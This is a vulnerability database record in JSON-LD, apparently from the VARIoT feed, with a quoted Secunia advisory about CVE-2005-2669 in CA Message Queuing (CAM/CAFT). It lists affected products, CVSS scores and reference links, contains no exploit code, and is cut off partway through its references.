1) An unspecified error in the CAM service can be exploited to cause a DoS by sending specially crafted packets to the TCP port.
2) Unspecified boundary errors can be exploited to cause buffer overflows by sending specially crafted packets to the service.
SOLUTION: Apply patches (see vendor advisory for details).
PROVIDED AND/OR DISCOVERED BY: Reported by vendor.
ORIGINAL ADVISORY: Computer Associates: http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200508-0052",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "2.2"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "unicenter remote control",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "unicenter data transport option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.11"
},
{
"model": "unicenter jasmine",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4.2"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.1"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0.1"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter management portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "cleverpath olap",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "5.1"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.9"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.4"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.2"
},
{
"model": "unicenter enterprise job manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "adviseit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter performance management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.1"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.5"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.2"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "brightstor portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter nsm wireless network management option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "advantage data transport",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.1"
},
{
"model": "cleverpath ecm",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.7"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.7"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.1"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.2"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "cleverpath aion",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.0"
},
{
"model": "unicenter management portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "computer associates",
"version": null
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4.2"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.1"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.1"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter remote control sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter performance management for openvms sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates unicenter nsm wireless network management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates unicenter management for websphere mq",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0.1"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.1"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter management for lotus notes/domino",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter jasmine",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter enterprise job manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter data transport option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.9"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.7"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates cleverpath olap",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.1"
},
{
"model": "associates cleverpath ecm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates cleverpath aion",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.0"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.11"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.07"
},
{
"model": "associates cam",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.05"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor san manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor san manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates brightstor portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates adviseit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates advantage data transport",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cam build 29 13",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.11"
},
{
"model": "associates cam build 220 13",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.07"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "BID",
"id": "14623"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
},
{
"db": "NVD",
"id": "CVE-2005-2669"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The discoverer of this issue is currently unknown. The vendor disclosed this issue.",
"sources": [
{
"db": "BID",
"id": "14623"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
],
"trust": 0.9
},
"cve": "CVE-2005-2669",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2005-2669",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-13878",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2005-2669",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#619988",
"trust": 0.8,
"value": "13.13"
},
{
"author": "CNNVD",
"id": "CNNVD-200508-223",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-13878",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13878"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
},
{
"db": "NVD",
"id": "CVE-2005-2669"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allows remote attackers to execute arbitrary commands via spoofed CAFT packets. CAM is prone to a vulnerability that could permit the spoofing of a CAFT application utilizing the CAM instance. This may ultimately allow the execution of arbitrary commands. \nCAFT is a file transfer application that utilizes CAM to send and receive the files. The problem presents itself due to a failure in the CAM service to verify the legitimacy of the CAFT application. \n\n----------------------------------------------------------------------\n\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\n\n\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\nSicherheit:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Various Products Message Queuing Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA16513\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/16513/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSpoofing, DoS, System access\n\nWHERE:\n\u003eFrom local network\n\nSOFTWARE:\nCA Unicenter TNG 2.x\nhttp://secunia.com/product/3206/\nCA Unicenter Software Delivery 4.x\nhttp://secunia.com/product/5597/\nCA Unicenter Software Delivery 3.x\nhttp://secunia.com/product/5596/\nCA Unicenter Service Level Management 3.x\nhttp://secunia.com/product/5595/\nCA Unicenter Remote Control 6.x\nhttp://secunia.com/product/2622/\nCA Unicenter Performance Management for OpenVMS 2.x\nhttp://secunia.com/product/5573/\nCA Unicenter Network and Systems Management (NSM) Wireless Network\nManagement Option 3.x\nhttp://secunia.com/product/5594/\nCA Unicenter Network and Systems Management (NSM) 3.x\nhttp://secunia.com/product/1683/\nCA Unicenter Management for WebSphere MQ 3.x\nhttp://secunia.com/product/5590/\nCA Unicenter Management for Web Servers 5.x\nhttp://secunia.com/product/5593/\nCA Unicenter Management for Microsoft Exchange 4.x\nhttp://secunia.com/product/5591/\nCA Unicenter Management for Lotus Notes/Domino 4.x\nhttp://secunia.com/product/5592/\nCA Unicenter Jasmine 3.x\nhttp://secunia.com/product/5589/\nCA Unicenter Enterprise Job Manager 1.x\nhttp://secunia.com/product/5588/\nCA Unicenter Data Transport Option 2.x\nhttp://secunia.com/product/5587/\nCA Unicenter Asset Management 4.x\nhttp://secunia.com/product/1682/\nCA Unicenter Asset Management 3.x\nhttp://secunia.com/product/5586/\nCA Unicenter Application Performance Monitor 3.x\nhttp://secunia.com/product/5585/\nCA eTrust Admin 8.x\nhttp://secunia.com/product/5584/\nCA eTrust Admin 2.x\nhttp://secunia.com/product/5583/\nCA CleverPath Predictive Analysis Server 3.x\nhttp://secunia.com/product/5581/\nCA CleverPath Predictive Analysis Server 2.x\nhttp://secunia.com/product/5580/\nCA CleverPath OLAP 5.x\nhttp://secunia.com/product/5578/\nCA CleverPath Enterprise Content Manager (ECM) 3.x\nhttp://secunia.com/product/5579/\nCA CleverPath Aion 10.x\nhttp://secunia.com/product/5582/\nCA BrightStor SAN Manager 11.x\nhttp://secunia.com/product/5576/\nCA BrightStor SAN Manager 1.x\nhttp://secunia.com/product/5575/\nCA BrightStor Portal 11.x\nhttp://secunia.com/product/5577/\nCA Advantage Data Transport 3.x\nhttp://secunia.com/product/5574/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in various products within\nthe CA Message Queuing (CAM / CAFT) software, which can be exploited\nby malicious people to cause a DoS (Denial of Service) or compromise\na vulnerable system. \n\n1) An unspecified error in the CAM service can be exploited to cause\na DoS by sending specially crafted packets to the TCP port. \n\n2) Unspecified boundary errors can be exploited to cause buffer\noverflows by sending specially crafted packets to the service. \n\nSOLUTION:\nApply patches (see vendor advisory for details). \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by vendor. \n\nORIGINAL ADVISORY:\nComputer Associates:\nhttp://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2669"
},
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "BID",
"id": "14623"
},
{
"db": "VULHUB",
"id": "VHN-13878"
},
{
"db": "PACKETSTORM",
"id": "39503"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "14623",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "16513",
"trust": 2.6
},
{
"db": "NVD",
"id": "CVE-2005-2669",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "18917",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2005-1482",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1014756",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014760",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014761",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014763",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014764",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014765",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014766",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014767",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014768",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014769",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014770",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014771",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014772",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014773",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014774",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014775",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "18916",
"trust": 0.8
},
{
"db": "BID",
"id": "14622",
"trust": 0.8
},
{
"db": "CERT/CC",
"id": "VU#619988",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-13878",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "39503",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#619988"
},
{
"db": "VULHUB",
"id": "VHN-13878"
},
{
"db": "BID",
"id": "14623"
},
{
"db": "PACKETSTORM",
"id": "39503"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
},
{
"db": "NVD",
"id": "CVE-2005-2669"
}
]
},
"id": "VAR-200508-0052",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-13878"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-03T22:23:58.712000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Computer Associates Message Queuing Security hole Repair measures",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146856"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-223"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2669"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp"
},
{
"trust": 2.5,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=32919"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/14623"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/18917"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/16513"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2005/1482"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/16513/"
},
{
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_faqs.asp"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14622"
},
{
"trust": 0.8,
"url": "http://osvdb.org/displayvuln.php?osvdb_id=18916"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014775.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014774.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014773.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014772.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014771.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014770.html"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/alerts/2005/aug/1014769.html"
},
{
"trust": 0.8,
